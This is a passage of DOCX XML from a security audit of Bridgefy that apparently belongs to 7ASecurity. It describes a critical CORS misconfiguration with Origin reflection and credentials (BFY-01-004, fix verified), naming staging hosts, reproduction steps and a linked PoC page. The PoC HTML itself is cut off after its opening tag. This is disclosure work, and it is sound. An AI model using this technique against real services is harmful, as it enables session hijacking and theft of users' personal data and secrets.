          <w:tab w:pos="2159" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="38" w:after="0"/>
        <w:ind w:left="2159" w:right="0" w:hanging="359"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>As</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> above</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:header="0" w:footer="1147" w:top="1780" w:bottom="1340" w:left="1440" w:right="1080"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="320"/>
        <w:rPr>
          <w:sz w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:name="_TOC_250052" w:id="3"/>
      <w:r>
        <w:rPr>
          <w:color w:val="002F7B"/>
        </w:rPr>
        <w:t>Identified </w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
      <w:r>
        <w:rPr>
          <w:color w:val="002F7B"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto" w:before="353"/>
        <w:ind w:left="720" w:right="375"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>This area of the report enumerates findings that were deemed to exhibit greater risk potential. Please note these are offered sequentially as they were uncovered, they are not sorted by significance or impact. Each finding has a unique ID (i.e. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>BFY-01-001</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>for ease of reference, and offers an estimated severity in brackets alongside the title.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_TOC_250051" w:id="4"/>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>BFY-01-004</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>WP2/3:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Impersonation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>2FA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>bypass</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>via</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>CORS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Misconfig</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="980000"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Critical</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="56"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="372"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Retest Notes: </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Fix Verified. The Bridgefy team resolved this issue and 7ASecurity verified that the fix is valid.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="363"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>It was found that the Bridgefy SDK API operates with an unrestricted </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Cross-Origin Resource Sharing </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(CORS)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> configuration. This behavior is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>unsupported</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>by</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>browsers,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>as it is explicitly forbidden by the CORS RFC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>, which specifies that </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>“If credentials mode is "include", then Access-Control-Allow-Origin cannot</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>be</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>*.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>However,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>application</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>gets around this by reflecting back the Origin request header in CORS responses, while credentials are also allowed. As a result, any third party website is able to send authenticated CORS requests, as well as read authenticated CORS responses simply invoking the API using</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>JavaScript.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>malicious</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>unauthenticated</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>attacker,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>able</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>entice</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>a logged in Bridgefy user to visit an attacker-controlled website, could leverage this weakness to perform any API action on behalf of the user (i.e.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>change</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>all</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>profile data, add arbitrary bundle IDs to licenses, etc.), as well as retrieve all user Personally Identifiable Information (PII), API keys, client secrets, card data, etc.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0"/>
        <w:ind w:left="720" w:right="4802" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Affected Hosts: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>staging.sdk.bridgefy.services staging.app.bridgefy.services</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>This</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>issue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>can</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>be</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>replicated</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>as</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>follows:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1438" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="38" w:after="0"/>
        <w:ind w:left="1438" w:right="0" w:hanging="358"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Login</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId19">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="22"/>
            <w:u w:val="single" w:color="1154CC"/>
          </w:rPr>
          <w:t>https://developer.staging.bridgefy.me/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1438" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="38" w:after="0"/>
        <w:ind w:left="1438" w:right="0" w:hanging="358"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>From</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>another</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>browser</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>tab,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>open</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>following</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>PoC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>page:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>PoC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>URL:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:hyperlink r:id="rId28">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:u w:val="single" w:color="1154CC"/>
          </w:rPr>
          <w:t>https://7as.es/Bridgefy_ytn9q4n7/cors_poc.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>PoC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>HTML:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="37"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="62A25C"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="11"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="7"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="7"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" allowOverlap="1" layoutInCell="1" locked="0" behindDoc="1" simplePos="0" relativeHeight="487589376">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>914400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>74343</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1828800" cy="1270"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="14" name="Graphic 14"/>
                <wp:cNvGraphicFramePr>
                  <a:graphicFrameLocks/>
                </wp:cNvGraphicFramePr>
                <a:graphic>
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvPr id="14" name="Graphic 14"/>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5.853834pt;width:144pt;height:.1pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:-15727104;mso-wrap-distance-left:0;mso-wrap-distance-right:0" id="docshape7" coordorigin="1440,117" coordsize="2880,0" path="m1440,117l4320,117e" filled="false" stroked="true" strokeweight=".75pt" strokecolor="#000000">
                <v:path arrowok="t"/>
                <v:stroke dashstyle="solid"/>
                <w10:wrap type="topAndBottom"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="110"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="17"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId29">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="44"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId30">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://fetch.spec.whatwg.org/#cors-protocol-and-credentials</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:header="0" w:footer="1147" w:top="1780" w:bottom="1340" w:left="1440" w:right="1080"/>
        </w:sectPr>
      </w:pPr>
